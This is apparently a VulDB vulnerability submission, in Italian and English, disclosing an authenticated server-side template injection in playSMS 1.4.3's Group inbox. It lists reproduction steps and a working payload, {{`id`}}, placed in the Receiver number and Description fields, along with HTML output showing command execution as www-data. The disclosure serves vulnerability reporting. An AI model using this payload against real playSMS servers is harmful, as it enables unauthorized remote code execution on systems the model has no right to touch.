| Titolo | playSMS 1.4.3 Server Side Template Injection (SSTI) |
|---|
| Descrizione | PlaySMS 1.4.3 has authenticated Server Side Template Injection in Group inbox. The manipulation of the argument "Receiver number" and "Description", that leads to a Authenticated RCE
1. Authenticate in login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login
2. Features > Group inbox (/index.php?app=main&inc=feature_inboxgroup&op=list)
3. Click in Plus (+) icon to add new group
4. Add payload {{`id`}} in "Receiver number" and "Description field
5. Save and back to Features > Group inbox
Also we can click in action edit to view Description RCE
<tr><td class=label-sizer>Receiver number</td><td>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</td></tr>
<tr><td>Keywords</td><td><input type='text' name='keywords' value='' maxlength='100'><i class='glyphicon glyphicon-info-sign playsms-tooltip' data-toggle=tooltip title='Separate with comma for multiple items' rel=tooltip></i></td></tr>
<tr><td>Description</td><td><input type='text' name='description' value='uid=33(www-data) gid=33(www-data) groups=33(www-data)
' maxlength='100'></td> |
|---|
| Fonte | ⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/inboxgroup |
|---|
| Utente | Dhimitri (UID 45045) |
|---|
| Sottomissione | 25/06/2024 01:15 (2 anni fa) |
|---|
| Moderazione | 03/07/2024 07:29 (8 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 270278 [playSMS 1.4.3 Template index.php?app=main&inc=feature_inboxgroup&op=list Receiver Number escalationi di privilegi] |
|---|
| Punti | 20 |
|---|